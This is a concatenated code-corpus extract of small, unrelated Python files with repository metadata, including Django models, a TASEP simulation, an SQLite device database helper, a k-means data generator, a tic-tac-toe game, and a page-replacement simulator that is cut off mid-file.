            sampleY = distSample(DistY[:, 0], DistY[:, 1], rndNum[1])
        nXbetter += int(sampleX > sampleY)
        nYbetter += int(sampleY > sampleX)
    pXbetter = nXbetter / accuracy
    pYbetter = nYbetter / accuracy
    return [pXbetter, pYbetter]
|
[
"manuel.guth@gmx.net"
] |
manuel.guth@gmx.net
|
1507b7a88f9e1cb0e59499eaa00107a31deafb07
|
1fd7149ee0f7e945b178a42e3dcaee4eba0c60ee
|
/app/models.py
|
f72825e37db91a57dd111e97a492ed1ccc432677
|
[
"Apache-2.0"
] |
permissive
|
wenzizone/simpleCMDB
|
7e0d96d68a2daf61901571e7f52cd008730a2c6f
|
03e6c005e9e860531ffed72aacaf1ebf8c666035
|
refs/heads/master
| 2021-01-09T20:35:05.103711
| 2016-07-13T15:53:03
| 2016-07-13T15:53:03
| 60,067,263
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,660
|
py
|
# -*- coding:utf-8 -*-
from __future__ import unicode_literals
from django.db import models
# Create your models here.
# Data center / hosting location a server lives in.
class Cloud(models.Model):
    name = models.CharField(max_length=50)
    comments = models.CharField(max_length=255, null=True)

    # def __unicode__(self):
    #    return u'%d %s %s' % (self.id, self.name, self.comments)
# Service/product a server is assigned to.
class Product(models.Model):
    name = models.CharField(max_length=50)
    subproduct = models.CharField(max_length=100)
    product_info = models.CharField(max_length=255, null=True)

    # def __unicode__(self):
    #    return u'%d %s %s %s' % (self.id, self.name, self.subproduct,
    #            self.product_info)
# Server record.
# Entered or selected manually when a server is added.
class Server(models.Model):
    public_ip = models.GenericIPAddressField()
    cloud = models.ForeignKey(Cloud)
    # NOTE(review): free-text flag (max_length=8) — presumably "yes"/"no" for
    # whether the server is located in China; confirm the expected values.
    in_china = models.CharField(max_length=8)
    product = models.ForeignKey(Product)
    create_time = models.DateField()
    server_status = models.CharField(max_length=20)
    update_time = models.DateField(null=True)

    # def __unicode__(self):
    #    return u'%d %s %s %s %s %s %s' % (self.id,
    #            self.objects.filter(cloud=models.Cloud.id), self.in_china, self.product,
    #            self.server_status, self.create_time, self.update_time)
# Detailed (discovered) server information.
# Updated automatically when ansible runs.
class Detail(models.Model):
    # One Detail row per Server. NOTE(review): ForeignKey(unique=True) is the
    # legacy spelling of OneToOneField; consider migrating when touching this.
    server = models.ForeignKey(Server, unique=True)
    hostname = models.CharField(max_length=255)
    internal_ip = models.GenericIPAddressField()
    system = models.CharField(max_length=50)
    update_time = models.DateField(null=True)
|
[
"wenzizone@126.com"
] |
wenzizone@126.com
|
423ba65aa9e0c52af1aed42ca9aadde25402c1e3
|
091233607bba00f1a4ada244231a1b4165881815
|
/blog/models.py
|
43c83e2f91d0192006e3196969342397acc820d5
|
[] |
no_license
|
dulcedu/Monitoring
|
74683202d5d917c52cef947616bc08c379e031c2
|
0e41a35c6db2496984de1ad8460e3289fbab85e6
|
refs/heads/master
| 2020-04-05T13:04:18.859902
| 2017-07-13T02:54:28
| 2017-07-13T02:54:28
| 95,055,228
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 531
|
py
|
from django.db import models
from django.utils import timezone
class Post(models.Model):
    """A blog post authored by a Django auth user.

    created_date is stamped at creation; published_date stays NULL until
    publish() is called explicitly.
    """
    author = models.ForeignKey('auth.User')
    title = models.CharField(max_length=200)
    text = models.TextField()
    created_date = models.DateTimeField(
        default=timezone.now)
    published_date = models.DateTimeField(
        blank=True, null=True)

    def publish(self):
        """Mark the post as published right now and persist it."""
        self.published_date = timezone.now()
        self.save()

    def __str__(self):
        return self.title
# Create your models here.
|
[
"dulcedu@gmail.com"
] |
dulcedu@gmail.com
|
1cb5153b97fd56483da49cff2155bef39089fef7
|
07f0e9c7d80292576e04e41bcc2e97a140a32006
|
/TASEP/open_bc_random_particles.py
|
3a492098ebabe4dad27f02a9efde3728d4942c8c
|
[] |
no_license
|
rahulmeena810/TASEP
|
422e38b02307a6e39ef0fd2c12f443e833a45760
|
970d852741d36e9426093ab9e0bd0c8838aebc13
|
refs/heads/master
| 2021-06-16T07:21:09.863221
| 2017-05-30T10:21:41
| 2017-05-30T10:21:41
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,911
|
py
|
import random
import math
import numpy as np
import matplotlib.pyplot as plt
# no. of sites (number of lattice sizes simulated: L = 1..n)
n = 1000
l = np.zeros(n, dtype=int)
for i in range(n):
    l[i] = i + 1

# measured density for each lattice size
p = np.zeros(n, dtype=float)

# TASEP rates: injection (alpha), extraction (beta), hop (q)
alpha = 1
beta = 0
q = 1

for k in range(n):
    site = np.zeros(l[k], dtype=int)  # 1 = occupied, 0 = empty
    noOfParticles = 0
    sitesOccupied = []  # lattice positions currently holding a particle
    for r in range(100):
        i = random.randint(0, l[k] - 1)
        if i == 0 and site[0] == 0:
            # injection at the left boundary with probability alpha
            t = random.uniform(0, 1)
            if t < alpha:
                site[0] = 1
                noOfParticles += 1
                sitesOccupied.append(0)
        elif i == l[k] - 1 and site[l[k] - 1] == 1:
            # extraction at the right boundary with probability beta
            t = random.uniform(0, 1)
            if t < beta:
                site[l[k] - 1] = 0
                noOfParticles -= 1
                sitesOccupied.remove(l[k] - 1)
        # Attempt a rightward hop of a randomly chosen occupied site.
        # BUG FIX: the original used random.randint(0, len(sitesOccupied)),
        # whose upper bound is INCLUSIVE, so it could index one past the end
        # (and crashed with IndexError when the list was still empty).
        if not sitesOccupied:
            continue
        pos = sitesOccupied[random.randrange(len(sitesOccupied))]
        # BUG FIX: the original tested site[sitesOccupied[i]+1] but then
        # updated site[i]/site[i+1] and removed the value `i` — i.e. it mixed
        # up the index into sitesOccupied with the lattice position. Use the
        # chosen lattice position `pos` consistently.
        if pos != l[k] - 1 and site[pos + 1] == 0:
            t = random.uniform(0, 1)
            if t < q:
                site[pos] = 0
                site[pos + 1] = 1
                sitesOccupied.remove(pos)
                sitesOccupied.append(pos + 1)
    p[k] = noOfParticles / l[k]
    print(k)

print(p)
plt.scatter(l, p, marker='o')
plt.xlabel("L(no. of sites)")
plt.ylabel("Density")
plt.show()
# if i have to move particles randomly then how will i fill the first site.
|
[
"noreply@github.com"
] |
rahulmeena810.noreply@github.com
|
553c6f2c743e4c35f72f296a10c63119d43226c0
|
c5cb31e88abdd44b6a7b568e8bc1a884ecfaa0b1
|
/app/db.py
|
88d0e50716465d80decc229eab1c01689edb6c29
|
[
"MIT"
] |
permissive
|
nitrocode/phone-code-names
|
7c7d9675ef41601d7f7ccd3ad30ad1d48e80ab1a
|
172050f8683616d3bb052ea21406545f31dc2c09
|
refs/heads/main
| 2021-06-21T18:44:19.063996
| 2021-04-21T15:13:39
| 2021-04-21T15:13:39
| 215,901,319
| 8
| 0
|
NOASSERTION
| 2021-04-21T15:13:39
| 2019-10-17T23:13:12
|
HTML
|
UTF-8
|
Python
| false
| false
| 4,395
|
py
|
import sqlite3
from sqlite3 import Error
# Table and column names for the device-catalog CSV import.
DEVICE_TABLE = 'devices'
DEVICE_FIELDS = ['brand', 'name', 'device', 'model', 'source']

# Table and column names for the code-name statistics CSV import.
STAT_TABLE = 'stats'
STAT_FIELDS = ['rank', 'code', 'code_orig', 'count', 'source']

# Table and column names for the phone-spec CSV import
# (presumably a fonoapi dump, judging by the name — verify against the importer).
FONO_TABLE = 'fono'
FONO_FIELDS = [
    'rank', 'count', 'code',
    'Brand', 'DeviceName', '_2g_bands', '_3_5mm_jack_', '_3g_bands',
    '_4g_bands', 'alert_types', 'announced', 'audio_quality', 'battery_c',
    'bluetooth', 'body_c', 'browser', 'build', 'camera', 'card_slot',
    'chipset', 'colors', 'cpu', 'dimensions', 'display', 'display_c', 'edge',
    'features', 'features_c', 'gprs', 'gps', 'gpu', 'infrared_port',
    'internal', 'java', 'loudspeaker', 'loudspeaker_', 'messaging',
    'multitouch', 'music_play', 'network_c', 'nfc', 'os', 'performance',
    'price', 'primary_', 'protection', 'radio', 'resolution', 'sar', 'sar_eu',
    'sar_us', 'secondary', 'sensors', 'sim', 'single', 'size', 'sound_c',
    'speed', 'stand_by', 'status', 'talk_time', 'technology', 'type', 'usb',
    'video', 'weight', 'wlan'
]
def create_connection(db_file):
    """Open a connection to the SQLite database at *db_file*.

    :param db_file: database file path (or ":memory:")
    :return: sqlite3.Connection on success, None on failure
    """
    try:
        return sqlite3.connect(db_file)
    except Error as exc:
        print(exc)
        return None
def create_table(conn, table, fields):
    """Create `table` with one untyped column per name in `fields`."""
    columns = ','.join(fields)
    cursor = conn.cursor()
    cursor.execute(f"CREATE TABLE {table} ({columns});")
    cursor.close()
def create_devices_table(conn):
    """Create the devices table with the DEVICE_FIELDS columns."""
    return create_table(conn, DEVICE_TABLE, DEVICE_FIELDS)
def create_stats_table(conn):
    """Create the stats table with the STAT_FIELDS columns."""
    return create_table(conn, STAT_TABLE, STAT_FIELDS)
def create_fono_table(conn):
    """Create the fono (device specs) table with the FONO_FIELDS columns."""
    return create_table(conn, FONO_TABLE, FONO_FIELDS)
def insert_row(conn, table, fields, to_db):
    """Bulk-insert the rows in `to_db` (a sequence of row sequences) into `table`.

    The placeholder count is taken from the first row, so all rows must have
    the same length.
    """
    placeholders = ', '.join('?' * len(to_db[0]))
    columns = ','.join(fields)
    cursor = conn.cursor()
    cursor.executemany(f"INSERT INTO {table} ({columns}) VALUES ({placeholders});", to_db)
    conn.commit()
    cursor.close()
def insert_row_dict(conn, table, fields, to_db):
    """Insert data to db for csv"""
    # NOTE(review): this is byte-for-byte identical to insert_row and, despite
    # the name, still expects `to_db` to be a sequence of row *sequences*, not
    # dicts — confirm the intended difference before relying on it.
    cur = conn.cursor()
    values = ', '.join(["?"]*len(to_db[0]))
    cur.executemany(
        f"INSERT INTO {table} ({','.join(fields)}) VALUES ({values});",
        to_db
    )
    conn.commit()
    cur.close()
def insert_device_row(conn, to_db):
    """Bulk-insert device rows (sequences matching DEVICE_FIELDS) into the devices table."""
    return insert_row(conn, DEVICE_TABLE, DEVICE_FIELDS, to_db)
def insert_stat_row(conn, to_db):
    """Bulk-insert stat rows (sequences matching STAT_FIELDS) into the stats table."""
    return insert_row(conn, STAT_TABLE, STAT_FIELDS, to_db)
def insert_fono_row(conn, to_db):
    """Bulk-insert spec rows (sequences matching FONO_FIELDS) into the fono table."""
    return insert_row(conn, FONO_TABLE, FONO_FIELDS, to_db)
def get_device(conn, search):
    """Look up one device by exact device/model name, falling back to a
    case-insensitive substring match.

    :param conn: the Connection object
    :param search: device or model string to search for
    :return: dict mapping DEVICE_FIELDS names to values, or None when no match
    """
    columns = ','.join(DEVICE_FIELDS)
    cursor = conn.cursor()
    # First attempt: exact match on either the device or the model column.
    cursor.execute(f"select {columns} from {DEVICE_TABLE} where device = ? or model = ?",
                   (search, search))
    row = cursor.fetchone()
    if not row:
        # Fallback: case-insensitive (COLLATE NOCASE) substring search.
        pattern = '%' + search + '%'
        cursor.execute(f"select {columns} from {DEVICE_TABLE} where device like ? or model like ? "
                       'COLLATE NOCASE;',
                       (pattern, pattern))
        row = cursor.fetchone()
    cursor.close()
    if row:
        return dict(zip(DEVICE_FIELDS, row))
def get_lineageos_stats(conn, limit):
    """Return up to `limit` (rank, code, count) rows from the stats table.

    Rows come back as sqlite3.Row objects so callers can index them by name.

    :param conn: the Connection object
    :param limit: maximum number of rows to return
    :return: list of sqlite3.Row
    """
    conn.row_factory = sqlite3.Row
    cur = conn.cursor()
    # Bind the limit as a parameter instead of interpolating it into the SQL:
    # this avoids injection and rejects non-integer input early.
    cur.execute('select rank, code, count from stats limit ?;', (int(limit),))
    data = cur.fetchall()
    cur.close()
    # Restore the default row factory so later queries are unaffected.
    conn.row_factory = None
    return data
|
[
"nitrocode@users.noreply.github.com"
] |
nitrocode@users.noreply.github.com
|
106c8194d133957671c982f1d2867ec94373e485
|
a37105fb7af3d6e29c407702db2b43066c0abd1a
|
/icc_pt2/week1/ExeProg_02/TESTES_tarefa_praticar_ex02.py
|
6c6e90492c920b7db027d10f236196da3bffcc31
|
[] |
no_license
|
roque-brito/ICC-USP-Coursera
|
19bc0c6eb03ee6a1671eb9ceb104453bb8554cfc
|
628383080fd44606c7ab1927b3dc3062b47c0c88
|
refs/heads/master
| 2023-05-09T21:42:35.786829
| 2021-06-11T00:37:14
| 2021-06-11T00:37:14
| 363,147,051
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 377
|
py
|
def sao_multiplicaveis(m1, m2):
    """Return True when matrices m1 and m2 can be multiplied (m1 x m2).

    Two matrices are multiplicable when the number of columns of m1 equals
    the number of rows of m2.
    """
    # `if cond: return True else: return False` collapses to the comparison itself.
    return len(m1[0]) == len(m2)
def teste():
    """Exercise sao_multiplicaveis with a 3x1 matrix and a 1x3 matrix."""
    m1 = [[1, 2, 3], [4, 5, 6]]
    m2 = [[2, 3, 4], [5, 6, 7]]
    m3 = [[1], [2], [3]]
    m4 = [[1, 2, 3]]
    return sao_multiplicaveis(m3, m4)
# Run the self-test when the module is executed and print the result.
x = teste()
print(x)
|
[
"roque.brito@outlook.com"
] |
roque.brito@outlook.com
|
dbd0c8435ceecd1429f22d8e256b5e74133012b1
|
786a89a4bd31e0a5953094c7880021cc98f78f98
|
/train/TR/ABC058c.py
|
90266401f080df01ed4d6a2c887c5c71ee375ba7
|
[] |
no_license
|
enjoy82/atcodersyozin
|
c12eb9cc04e61cedcdc13643b84e8c87c13ff4b1
|
c8a73577d1d75db2d5c22eab028f942f75f2fba7
|
refs/heads/master
| 2022-10-04T04:47:16.835712
| 2022-09-30T07:15:47
| 2022-09-30T07:15:47
| 243,669,940
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 431
|
py
|
# ABC058 C: read n strings and output the longest string that can be assembled
# from every one of them — for each letter keep the minimum count across all
# strings, then print the letters in alphabetical order.
n = int(input())
alpha = ("abcdefghijklmnopqrstuvwxyz")
# ans[k] = minimum number of times alpha[k] occurs in every string seen so far.
ans = [100] * 26
for _ in range(n):
    s = input()
    for k, ch in enumerate(alpha):
        # str.count replaces the original hand-rolled character-matching loops.
        ans[k] = min(ans[k], s.count(ch))
print("".join(ch * ans[k] for k, ch in enumerate(alpha)))
|
[
"naoya990506@gmail.com"
] |
naoya990506@gmail.com
|
33f2b3e6e555b098045a42fd33677e80c2dca3ad
|
94528515b0544aba0258601d53b28fd337a8b204
|
/data-generator/kmeans_gen.py
|
509f187efe33ebb0b41bf5f511dc87a50fa860e1
|
[] |
no_license
|
harshavardhana/KVCBench
|
6f801c0830c1d48ee40e3ba460ef6bdd12597324
|
b7c0a91e0a74ca22d2f5b6279b36cb96079b8d16
|
refs/heads/master
| 2020-06-23T22:52:34.170277
| 2017-03-09T10:41:30
| 2017-03-09T10:41:30
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,203
|
py
|
#!/usr/bin/env python
# Kmeans data generator
# Each record is a point which has D dimensions, each dimension has a float value range from [vmin, vmax]
# The data is formated as:
#
# d11, d12, d13, ...
# d21, d22, d23, ...
# ...
import optparse
import os
import math
import random
import multiprocessing
# fileSize = 234 * 1024 * 1024
# fileNum = 40
#
# dimension = 100
# max_value = 80
# min_value = -40
# Prefix shared by every generated slice file name.
output_file_prefix = "kmeans.data"
def gen_worker(p_id, file_number, file_size, store_path, dim, vmax, vmin):
    # Worker body (Python 2): write `file_number` slice files, each filled with
    # random `dim`-dimensional points until the file reaches `file_size` bytes.
    print "Work-%d, process %d" % (p_id, file_number)
    if file_number <= 0:
        return
    for k in range(file_number):
        output_file_name = "%s-%d-%d.out" % (output_file_prefix, p_id, k)
        output_file_path = os.path.join(store_path, output_file_name)
        out = open(output_file_path, "w")
        # NOTE(review): the file is never closed, so os.stat() sees only what
        # the buffer has flushed; consider out.close() after the loop.
        while os.stat(output_file_path).st_size < file_size:
            lineStr = ""
            for j in xrange(dim):
                # NOTE(review): `random.random() * vmin + vmax` does not span
                # [vmin, vmax]; presumably `random.random() * (vmax - vmin) + vmin`
                # was intended — confirm before changing.
                lineStr = lineStr + " %.4f" % (random.random() * vmin + vmax)
            lineStr = lineStr[1:] + "\n"
            out.write(lineStr)
        print out.name + " complete."
if __name__ == '__main__':
    # Command-line interface (Python 2 / optparse); every flag has a default so
    # the script can run with no arguments.
    parser = optparse.OptionParser()
    parser.add_option('-w', '--worker',
                      action="store", dest="worker_size", help="number of worker process (default: 1)",
                      type='int', default=1)
    parser.add_option('-s', '--filesize',
                      action="store", dest="file_size", help="each slice file size in mega-bytes (default: 234 [MB])",
                      type='int', default=234)
    parser.add_option('-n', '--filenum',
                      action='store', dest="file_number", help="number of slice files (default: 40)",
                      type='float', default=40.0)
    parser.add_option('-d', '--dimension',
                      action='store', dest='dim', help="dimension for each record (default: 100)",
                      type='int', default=100)
    parser.add_option('-p', '--path',
                      action='store', dest='dest_path', help='destination path (default: .)',
                      type='string', default='.')
    # NOTE(review): the --min/--max help strings appear swapped ("maximum" vs
    # "minimum"), and these defaults disagree with the commented-out values at
    # the top of the file — confirm which range is intended.
    parser.add_option('--min',
                      action='store', dest='min_value', help="maximum for each dimension (default -80.0)",
                      type='float', default=-80.0)
    parser.add_option('--max',
                      action='store', dest='max_value', help="minimum for each dimension (default 40.0)",
                      type='float', default=40)
    options, args = parser.parse_args()
    worker_size = options.worker_size
    file_size = options.file_size * 1024 * 1024  # megabytes -> bytes
    total_file_number = options.file_number
    dim = options.dim
    min_value = options.min_value
    max_value = options.max_value
    dest_path = options.dest_path
    if not os.path.exists(dest_path):
        os.makedirs(dest_path)
    def formatSize(fsize):
        # Human-readable byte count (B / KB / MB / GB).
        ONE_KB_MAX = 1024.0
        ONE_MB_MAX = 1024.0 * 1024
        ONE_GB_MAX = 1024.0 * 1024 * 1024
        if fsize < ONE_KB_MAX:
            return "%d B" % fsize
        elif fsize < ONE_MB_MAX:
            return "%.2f KB" % (fsize / ONE_KB_MAX)
        elif fsize < ONE_GB_MAX:
            return "%.2f MB" % (fsize / ONE_MB_MAX)
        else:
            return "%.2f GB" % (fsize / ONE_GB_MAX)
    print """
    Generator Worker Number: %d
    Total data size: %s, total file number: %d, each file size: %s
    Destination path: %s
    Dimension: %d, min value: %.2f, max value: %.2f
    """ % (worker_size,
           formatSize(file_size * total_file_number), total_file_number, formatSize(file_size),
           dest_path,
           dim, min_value, max_value)
    jobs = []
    # Spread the files as evenly as possible across the worker processes; the
    # last worker may get fewer than file_number_per_worker.
    file_number_per_worker = math.ceil(1.0 * total_file_number / worker_size)
    for pid in xrange(worker_size):
        if total_file_number >= file_number_per_worker:
            fnum = file_number_per_worker
        else:
            fnum = total_file_number
        p = multiprocessing.Process(target=gen_worker, args=(
            pid, int(fnum), file_size, dest_path, dim, max_value, min_value))
        jobs.append(p)
        p.start()
        total_file_number -= file_number_per_worker
|
[
"chcdlf@gmail.com"
] |
chcdlf@gmail.com
|
665ada025e0455410a209ed57869aa0dd912a015
|
27618b96c66aa397f15afb1463f36b0ee3c1bf67
|
/tictactoe.py
|
c0b5325ecdc236600e2a0d15d9cb980223fe15cc
|
[] |
no_license
|
connorbarkr/tictactoe
|
10fd5b47248de9036c14df7d9318c50f1302752e
|
a907bb1f9f2998caab2cd0cd2e87c680db0d1dfc
|
refs/heads/master
| 2021-07-04T10:54:11.538834
| 2017-09-24T20:55:16
| 2017-09-24T20:55:16
| 104,675,512
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,884
|
py
|
import random
# Reference board shown during the intro so players know which number maps to
# which square.
exampleBoard = ['1', '2', '3',
                '4', '5', '6',
                '7', '8', '9']
# Live game state: one entry per square, ' ' while unclaimed.
board = [' ', ' ', ' ',
         ' ', ' ', ' ',
         ' ', ' ', ' ']
def intro():
    """Show the tutorial board, announce who moves first, and return the coin flip."""
    goes_first = fiftyFifty()
    print("Here's what the board will look like:")
    drawBoard(exampleBoard)
    print("To select a tile to place your marker on, type the corresponding number when it's your turn!")
    print("You go first!" if goes_first == 0 else "The computer goes first!")
    return goes_first
def fiftyFifty():
    """Coin flip: return 0 or 1 with equal probability."""
    return random.randint(0, 1)
def oneToNine():
    """Return a random square number between 1 and 9 inclusive."""
    return random.randint(1, 9)
def teamChoice():
    """Prompt until the player enters 'x' or 'o'; return the uppercased choice."""
    while True:
        choice = input("Would you like to be x's or o's? (Type 'x' or 'o')").upper()
        if choice != 'X' and choice != 'O':
            print("I'm sorry, you'll have to input a valid choice")
            continue
        print("Great! You're team " + choice + "s.")
        # The original had an unreachable `break` after this `return`; the
        # return alone ends the loop.
        return choice
def playerMoveChoice(selection):
    """Ask the player for a square (1-9), place their marker on the global
    board, and redraw it."""
    while True:
        choice = input("Enter the number of the square you'd like to select: ")
        # Bug fix: the original tested choice.isalpha(), so inputs like "!" or
        # "" slipped through and crashed int(). isdigit() only accepts numbers.
        if not choice.isdigit() or int(choice) < 1 or int(choice) > 9:
            print("Please enter a valid number between 1 and 9.")
            continue
        if board[int(choice) - 1] != " ":
            print("That space is already taken! Pick a valid one.")
            continue
        board[int(choice) - 1] = selection
        drawBoard(board)
        break
def computerMoveChoice(computerSelection):
    """Pick a random free square for the computer, mark it, and redraw the board."""
    print("It's the computer's turn!")
    while True:
        target = oneToNine()
        if board[target - 1] == ' ':
            board[target - 1] = computerSelection
            drawBoard(board)
            return
def winnerCheck(board, symbol):
    """Return 1 if `symbol` fills any row, column, or diagonal of `board`, else 0.

    `board` is the flat 9-element list of square markers.
    """
    # All winning index triples, replacing the original 8-branch elif chain.
    lines = (
        (0, 1, 2), (3, 4, 5), (6, 7, 8),   # rows
        (0, 3, 6), (1, 4, 7), (2, 5, 8),   # columns
        (0, 4, 8), (2, 4, 6),              # diagonals
    )
    for a, b, c in lines:
        if board[a] == symbol and board[b] == symbol and board[c] == symbol:
            return 1
    return 0
def drawBoard(boardVals):
    """Print the 3x3 board with tab spacing and divider rows between the rows."""
    divider = "------------------------------------------------"
    for start in (0, 3, 6):
        row = boardVals[start:start + 3]
        print("\t" + row[0] + "\t|\t" + row[1] + "\t|\t" + row[2] + "\t")
        if start != 6:
            print(divider)
def main():
    """Run one full game: pick teams, flip for first move, then alternate
    turns until somebody wins.

    NOTE(review): there is no draw detection — a full board with no winner
    would loop forever in playerMoveChoice.
    """
    selection = teamChoice()
    computerSelection = "O" if selection == "X" else "X"
    first = intro()
    if first == 0:
        # Player moves first.
        while True:
            playerMoveChoice(selection)
            if winnerCheck(board, selection) == 1:
                print("You win!")
                break
            computerMoveChoice(computerSelection)
            if winnerCheck(board, computerSelection) == 1:
                print("You lose!")
                break
    else:
        # Computer moves first.
        while True:
            computerMoveChoice(computerSelection)
            if winnerCheck(board, computerSelection) == 1:
                print("You lose!")
                break
            playerMoveChoice(selection)
            if winnerCheck(board, selection) == 1:
                print("You win!")
                break
# Start a game immediately when the file runs (no __main__ guard in the original).
main()
|
[
"eskimopies1999@gmail.com"
] |
eskimopies1999@gmail.com
|
1016f6d79377f343fe8649f1097cb080aff6962d
|
e77b92df446f0afed18a923846944b5fd3596bf9
|
/Programers_algo/Study_1/pro1_pocketmon.py
|
c8c7710f15b1a4c88eb15ba5146900693aa6b42c
|
[] |
no_license
|
sds1vrk/Algo_Study
|
e40ca8eb348d1fc6f88d883b26195b9ee6f35b2e
|
fbbc21bb06bb5dc08927b899ddc20e6cde9f0319
|
refs/heads/main
| 2023-06-27T05:49:15.351644
| 2021-08-01T12:43:06
| 2021-08-01T12:43:06
| 356,512,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 340
|
py
|
# Pokemon problem (Programmers): choose half of `nums`, maximizing distinct types.
def solution(nums):
    """Return the maximum number of distinct pokemon types obtainable when
    picking exactly half of `nums`.

    You can never keep more distinct picks than there are distinct types, nor
    more than the len(nums)//2 available slots, so the answer is simply the
    smaller of the two — this replaces the original counting loop.
    """
    return min(len(set(nums)), len(nums) // 2)
# print(solution([3,1,2,3]))
# solution([3,3,3,2,2,4])
# Smoke-run: six pokemon of two distinct types (expected answer: 2).
solution([3,3,3,2,2,2])
|
[
"51287886+sds1vrk@users.noreply.github.com"
] |
51287886+sds1vrk@users.noreply.github.com
|
9db7580e07fa14bdd6136540b3edbc790d26733b
|
aa6ebe6ce8795c7a732ecd0fed658e57c5ca4187
|
/paging.py
|
17b6166e400655d6694de11f4292d99c964685b0
|
[] |
no_license
|
moses-netshitangani/Page-Replacement-Algorithm
|
e5f609bf7471bdb8e152e99b0cd9ae9677ca2ffe
|
6eb4bfea0534b96be9c34ed02a0ac60cdcf82914
|
refs/heads/master
| 2022-09-04T13:47:49.802598
| 2020-05-25T11:44:05
| 2020-05-25T11:44:05
| 264,755,152
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,086
|
py
|
# Program to simulate the FIFO, LRU and Optimal page replacement algorithms
# Names: Moses Netshitangani
# Student number: NTSNDI017
# Date: 16 May 2020
import random
import sys
# FIFO implementation
def FIFO(size, page_sequence_fifo):
    """Simulate First-In-First-Out page replacement; return the fault count.

    Memory is a list of [page, age] pairs. Every reference ages all resident
    pages and a hit does NOT reset the age, so the largest age always marks
    the earliest-loaded page — which is the FIFO victim.

    :param size: number of available frames
    :param page_sequence_fifo: sequence of page numbers to reference
    :return: total number of page faults
    """
    print(' FIFO '.center(80, "*"))
    page_faults = 0
    # 2D array to store page:age values. Acts as main memory
    memory_dict = []
    # insert rest of pages into memory
    for i in range(0, len(page_sequence_fifo)):
        page = page_sequence_fifo[i]
        # insert into new frame only if frame size not full
        if len(memory_dict) < size and check(page, memory_dict) == -1:
            page_faults += 1
            memory_dict = grow_age(memory_dict)
            memory_dict.append([page, 0])
        elif check(page, memory_dict) != -1:
            # means it's a hit. No need to reset page age's value
            # (ages keep growing on a hit, so eviction order stays insertion order)
            memory_dict = grow_age(memory_dict)
        else:
            # replace the oldest page in memory
            page_faults += 1
            memory_dict = grow_age(memory_dict)
            memory_dict[oldest(memory_dict)] = [page, 0]
    show_memory(memory_dict)
    return page_faults
# LRU implementation
def LRU(size, page_sequence_lru):
    """Simulate Least-Recently-Used page replacement; return the fault count.

    Memory is a list of [page, age] pairs. Every reference ages all resident
    pages and a hit resets the referenced page's age to 0, so the largest age
    always marks the least recently used page — the LRU victim.

    :param size: number of available frames
    :param page_sequence_lru: sequence of page numbers to reference
    :return: total number of page faults
    """
    print(' LRU '.center(80, "*"))
    page_faults = 0
    # 2D array to store page:age values. Acts as memory
    memory_dict = []
    # insert rest of pages into memory
    for i in range(0, len(page_sequence_lru)):
        page = page_sequence_lru[i]
        # insert into new frame only if frame size not full
        if len(memory_dict) < size and check(page, memory_dict) == -1:
            page_faults += 1
            memory_dict = grow_age(memory_dict)
            memory_dict.append([page, 0])
        elif check(page, memory_dict) != -1:
            # means it's a hit. Replace page's age value with 0, as if it were new
            memory_dict = grow_age(memory_dict)
            memory_dict[check(page, memory_dict)] = [page, 0]
        else:
            # replace the least recently used page in memory
            page_faults += 1
            memory_dict = grow_age(memory_dict)
            memory_dict[oldest(memory_dict)] = [page, 0]
    show_memory(memory_dict)
    return page_faults
# Optimal implementation
def OPT(size, page_sequence_opt):
    """Simulate Belady's optimal page replacement; return the fault count.

    On a fault with memory full, future() selects the resident page whose
    next reference lies furthest ahead in the reference string.

    :param size: number of available frames
    :param page_sequence_opt: sequence of page numbers to reference
    :return: total number of page faults
    """
    print(' OPT '.center(80, "*"))
    page_faults = 0
    # 2D array to store page:age values. Acts as memory
    memory_dict = []
    # insert rest of pages into memory
    for i in range(0, len(page_sequence_opt)):
        page = page_sequence_opt[i]
        # insert into new frame only if frame size not full
        if len(memory_dict) < size and check(page, memory_dict) == -1:
            page_faults += 1
            memory_dict = grow_age(memory_dict)
            memory_dict.append([page, 0])
        elif check(page, memory_dict) != -1:
            # means it's a hit.
            memory_dict = grow_age(memory_dict)
        else:
            # replace page that won't be used the most in the future, or the closest page using indices.
            page_faults += 1
            memory_dict = grow_age(memory_dict)
            memory_dict[future(i + 1, page_sequence_opt, memory_dict)] = [page, 0]
    show_memory(memory_dict)
    return page_faults
# returns index of page that is least used in the future
def future(start_index, page_numbers, memory_dict):
    """Return the memory index of the resident page referenced latest in the future.

    Scans page_numbers from start_index, eliminating resident pages as they
    are referenced; the survivor is the optimal eviction victim. If several
    resident pages are never referenced again, the first remaining one wins.

    :param start_index: position in page_numbers to start scanning from
    :param page_numbers: the full page reference string
    :param memory_dict: list of [page, age] pairs currently in memory
    :return: index (into memory_dict) of the page to evict
    """
    # Resident pages in memory order, used to translate a page back to its index.
    resident = [pair[0] for pair in memory_dict]
    remaining = list(resident)
    # (The original also built an unused `ages` list; dropped as dead code.)
    for position in range(start_index, len(page_numbers)):
        upcoming = page_numbers[position]
        if upcoming in remaining:
            remaining.remove(upcoming)
        if len(remaining) == 1:
            # This is the page that gets used latest in the future.
            return resident.index(remaining[0])
    # None of the remaining pages appear again: evict the first of them.
    return resident.index(remaining[0])
# prints out pages in a formatted way
def show_memory(memory_array):
    """Print the resident page numbers on a single line."""
    print('Final state of memory: ', end=" ")
    for pair in memory_array:
        print(pair[0], end=" ")
    print()
# returns index of oldest page in memory
def oldest(memory_dict):
    """Return the index of the entry with the greatest age, or -1 when memory
    is empty. Ties go to the first (lowest-index) entry."""
    if not memory_dict:
        return -1
    return max(range(len(memory_dict)), key=lambda idx: memory_dict[idx][1])
# checks to see if page is in memory
def check(page, memory_dict):
    """Return the memory index holding `page`, or -1 when it is not resident."""
    for idx, pair in enumerate(memory_dict):
        if pair[0] == page:
            return idx
    return -1
# increments the 'age' values of each page in memory
def grow_age(memory_dict):
    """Increment every resident page's age in place and return the same list."""
    for entry in memory_dict:
        entry[1] += 1
    return memory_dict
# converts user-entered page_sequence into sequence of integers
def process_pages(page_sequence):
